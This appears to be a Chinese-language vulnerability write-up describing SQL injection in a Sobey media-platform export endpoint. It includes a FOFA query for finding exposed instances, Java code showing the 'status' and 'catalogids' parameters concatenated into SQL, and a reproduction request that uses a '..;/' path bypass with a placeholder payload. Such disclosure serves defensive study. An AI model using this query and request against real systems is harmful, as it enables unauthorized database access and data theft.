索贝融媒体 /sobey-mchEditor/mch/Articlelist/articleExamineExport SQL注入漏洞


漏洞简介

索贝产品中的 /sobey-mchEditor/mch/Articlelist/articleExamineExport 接口存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句,获取数据库中的敏感信息,甚至可能导致数据库被完全控制。

影响版本

fofa语法

icon_hash="689611853"||app="SOBEY-融媒体" || body="You need to enable JavaScript to run this app" && header="Sobey"

漏洞分析

根据漏洞信息看下mch/Articlelist/articleExamineExport的实现逻辑

@RequestMapping(
    value = {"/articleExamineExport"},
    method = {RequestMethod.GET}
)
public Response articleScorelistExport(HttpServletResponse response, HttpServletRequest request, @RequestParam("token") String token, @RequestParam("siteCode") String siteCode, @RequestParam(value = "catalogids",required = false) String catalogids, @RequestParam(value = "status",required = false) String status, @RequestParam(value = "createStartTime",required = false) String createStartTime, @RequestParam(value = "endStartTime",required = false) String endStartTime) {
    if (!StringUtils.isEmpty(createStartTime) && !StringUtils.isEmpty(endStartTime)) {
        QueryBuilder qb = new QueryBuilder("select id,title,createUserName,publishDate,author from zcnarticle where 1=1 and status!=0");
        if (StringUtil.isNotEmpty(createStartTime)) {
            createStartTime = createStartTime + " 00:00:00";
            qb.append(" and createDate >= str_to_date(? ,'%Y-%m-%d %H:%i:%s')", createStartTime);
        }

        if (StringUtil.isNotEmpty(endStartTime)) {
            endStartTime = endStartTime + " 23:59:59";
            qb.append(" and createDate <= str_to_date(? ,'%Y-%m-%d %H:%i:%s')", endStartTime);
        }

        if (StringUtil.isNotEmpty(status)) {
            qb.append(" and status in(" + status + ")");
        }

        if (StringUtil.isNotEmpty(catalogids)) {
            qb.append(" and catalogID in(" + catalogids + ")");
        }

参数status和catalogids无任何过滤或校验处理,被直接拼接到qb这个sql语句中执行,从而造成了SQL注入漏洞。

漏洞复现

GET /sobey-mchEditor/js/..;/mch/Articlelist/articleExamineExport?siteCode=1&status=)SQLI_POC&token=1&createStartTime=&endStartTime= HTTP/1.1
Host: sobey.mrxn.net

通过报错注入获取到数据库用户信息


手机扫码阅读

孚盟云CRM AjaxSendDingdingMessage.ashx SQL注入漏洞

索贝融媒体 /sobey-mchEditor/count/catalogArticles SQL注入漏洞

评 论